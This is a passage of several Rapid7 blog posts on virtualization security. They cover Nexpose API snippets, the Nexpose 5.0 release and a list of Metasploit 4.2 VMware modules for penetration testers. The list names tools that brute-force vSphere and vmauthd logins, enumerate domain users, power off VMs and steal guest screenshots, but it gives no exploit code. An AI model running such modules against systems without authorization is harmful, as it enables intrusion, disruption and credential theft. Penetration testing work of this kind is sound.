    APIResponse deleteConnectionResponse = session.executeAPIRequest(deleteConnectionRequest);
    // Get the sync ID from the response.
    String syncID = deleteConnectionResponse.grab("/DiscoveryConnectionDeleteResponse/@sync-id");

4) List operation

    DiscoveryConnectionListingRequest connectionListingRequest = new DiscoveryConnectionListingRequest(
        sessionID,      // the session ID
        "sync");        // the sync ID
    APIResponse connectionListingResponse = session.executeAPIRequest(connectionListingRequest);
    // Get the sync ID from the response.
    String syncID = connectionListingResponse.grab("/DiscoveryConnectionListingResponse/@sync-id");

So you can easily manage your virtual connections. Let the automation begin!

Testing the Security of Virtual Data Centers

If you are doing security assessments, you are probably running into virtual servers every day. According to analyst firm Gartner, 80% of companies now have a virtualization project or program. With the recent 4.2 release of Metasploit, your next penetration test should be much more fun. For example, Metasploit now flags ESX servers as virtual hosts in the user interface.

If you are managing virtual servers, you may have come across the VMware vSphere Web Services SDK. It's a powerful way to manage virtual machines on ESX/ESXi and vCenter Server systems, with documentation that rivals the New York phone book (if it still exists as a printed version). Like most self-respecting APIs, it requires you to authenticate with a username and password, and that password may be the linchpin of your virtual data center's security: whoever holds it controls every guest on the host. In other words, you would be well advised to audit that the passwords for this API are not found in Average Joe's common password list. In the 4.2 release, Metasploit has added a new module that brute-forces passwords for the VMware vSphere Web Services API, plus a few modules that let penetration testers have fun with the virtual data center. The simplest let you shut down a critical server or spin up a virtual machine that has lain dormant for months and is probably crawling with vulnerabilities you can attack. You can also collect screenshots from all guest systems, which will come in handy for your security assessment report.

Systems running VMware virtualization technology, including ESX Server and VMware Workstation, also run a service called vmauthd, which authenticates against the OS's local user credentials. Metasploit now includes a brute-force module for vmauthd authentication, which gives you a second service through which to obtain system credentials. If an ESX server is integrated with Windows Active Directory, the enum_users module will even generate a list of all users and groups on the domain, which is fantastic for reconnaissance.

Here's a list of all the modules you can throw at your virtualized data center directly from Metasploit (module name, then what it does). The admin modules change state on the hypervisor (powering VMs off, killing sessions) and the login modules can trip account lockout policies, so agree both with the client before running them.

auxiliary/admin/vmware/poweroff_vm - Logs into the VMware web API and tries to power off a specified virtual machine.
auxiliary/admin/vmware/poweron_vm - Logs into the VMware web API and tries to power on a specified virtual machine.
auxiliary/admin/vmware/tag_vm - Logs into the VMware web API and 'tags' a specified virtual machine by logging a user event with user-supplied text.
auxiliary/admin/vmware/terminate_esx_sessions - Logs into the VMware web API and tries to terminate the user login sessions identified by the supplied session keys.
post/multi/gather/find_vmx - Attempts to find any VMware virtual machines stored on the target.
auxiliary/scanner/vmware/esx_fingerprint - Accesses the web API of VMware ESX/ESXi servers and attempts to identify the server's version.
auxiliary/scanner/vmware/vmauthd_login - Tests vmauthd logins on a range of machines and reports successful logins.
auxiliary/scanner/vmware/vmware_enum_permissions - Logs into the VMware web API and tries to enumerate all user/group permissions. Unlike enum_users, this covers only users and groups that have permissions explicitly defined within the VMware product.
auxiliary/scanner/vmware/vmware_enum_sessions - Logs into the VMware web API and tries to enumerate all login sessions.
auxiliary/scanner/vmware/vmware_enum_users - Logs into the VMware web API and tries to enumerate all user accounts. If the VMware instance is connected to one or more domains, it tries to enumerate domain users as well.
auxiliary/scanner/vmware/vmware_enum_vms - Attempts to discover virtual machines on any VMware instance running the web interface, which includes ESX/ESXi and VMware Server.
auxiliary/scanner/vmware/vmware_host_details - Attempts to enumerate information about host systems through the VMware web API, which can include the hardware installed on the host machine.
auxiliary/scanner/vmware/vmware_http_login - Attempts to authenticate to the VMware HTTP service on VMware Server, ESX and ESXi.
auxiliary/scanner/vmware/vmware_screenshot_stealer - Uses supplied login credentials to connect to VMware via the web interface, searches the datastores for screenshots, and downloads any it finds and saves them as loot.

In addition to the VMware modules, we've also added a post-exploitation module for VirtualBox, called post/multi/gather/enum_vbox. This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, so it needs to be invoked from a user context. If you would like to hear more about pentesting virtual environments, sign up for our free webcast with David Maloney from the Metasploit engineering team, who developed most of the new virtual pwning goodness.

Nexpose 5.0 Release

Today we released the latest version of Nexpose. This is a great release for those of you working in virtual environments: it adds dynamic virtual asset tracking, lets you track configuration policy scans, and introduces a new look and feel for the product itself. It also adds the capability to generate a Real Risk score that incorporates known malware exposure, and lets you track risk trends over time. Here's a link to the announcement we made at this year's UNITED Security Summit. With all this great news, we want to hear from you. Please share your thoughts on Nexpose 5.0, on our exciting funding news, or on anything else you want to share with us. Leave a comment here on the blog or send thoughts to rawfeedback@rapid7.com, and let us know: what do you think?

Virtualization - Introduces New Security Gaps

This is my first blog as a Rapid7 employee. I started in July of this year as a product manager, and my first project is helping a team build a new discovery method for Nexpose. Virtualization has been around since the 1960s, even though it didn't start to become mainstream until the late 1990s when VMware was founded. In recent years server virtualization has been growing at a rapid pace, and as it continues to spread it introduces gaps in your security program.

Over the last couple of months, I have talked with many security administrators and infrastructure teams about their challenges with virtualization. I was truly enlightened by the issues and concerns they are having, not only because we can immediately resolve some of them with our upcoming Nexpose 5.0 release, but also because common themes kept coming up.

The biggest common theme was no visibility into their virtual environments. This is a security gap because virtual environments are very dynamic, with virtual machines (VMs) being added, powered on and off, or moving between hosts all the time. It's hard to truly mitigate all of the risks if you don't know what you have out there; a VM that happens to be powered off when a network discovery scan runs never shows up in it.

I'm really excited to say that in Nexpose 5.0 you can leverage the new vAsset discovery method to discover VMs on VMware vCenter or ESX hosts. This lets you quickly discover all your VMs, both online and offline, without performing a network-based discovery scan. To narrow your results, you can filter VMs by the VM metadata retrieved over the VMware connection. After you have performed a vAsset discovery you can create a dynamic site that is kept up to date as your virtual environment changes; Nexpose is notified in real time when these changes happen, so your site is updated appropriately and your assets are not missed for vulnerability or compliance scanning.

Future versions of Nexpose will continue to address additional virtualization security gaps; please leave me a comment with any ideas you'd like to see.

The Next Security Frontier: Virtualization

Most pundits agree that virtualization is taking the industry by storm. Leading analyst group IDC projects that more than 70% of all server workloads installed on new shipments will reside in a virtual machine by 2014. With organizations lining up left and right to climb on the virtualization bandwagon, the security side of deploying virtualized software is a lot more nebulous. While virtualized deployments provide significant cost-saving potential, assets moving around between virtualized servers are a lot harder to stay on top of than those deployed in traditional physical server environments. Additionally, a breach in the virtualization layer can easily lead to a compromise of all hosted applications and data. At the same time, vendors have been following a similar steep learning curve in bringing their products up to speed with the latest evolution in virtualization technology.

Our vision at Rapid7 has always been that in order to provide a holistic view of an organization's security and risk posture, we need to correlate the various threat vectors that could lead to an attack. We broke new ground as the first vendor to offer a unified vulnerability management solution, NeXpose, which correlated vulnerabilities across the network, operating system, database and application tiers. We continued that product innovation when we acquired the Metasploit Project, the world's de facto standard penetration testing platform, and added the notion of exploitability directly into NeXpose. Virtualization is a natural evolution of our thinking. Maybe that is why the world's leading provider of virtualized solutions is both a client and a partner today.

With support for authenticated and remote vulnerability scans of VMware ESX and ESXi already in place in NeXpose, we are looking at how we can further help organizations continuously lower their risk posture in both physical and virtual environments. That's why we are so excited to have Christopher Young, VMware vice president and general manager and former RSA executive, join Rapid7's board of directors. With his significant security expertise, industry leadership and vision around virtualization, Christopher brings unique insight into industry-shaping trends to Rapid7. We look forward to having Christopher help define the exciting journey on which we're embarking for virtualization security and security management in general. Welcome Christopher!

Christopher Young, Rapid7 Board Member, VMware Vice President and General Manager
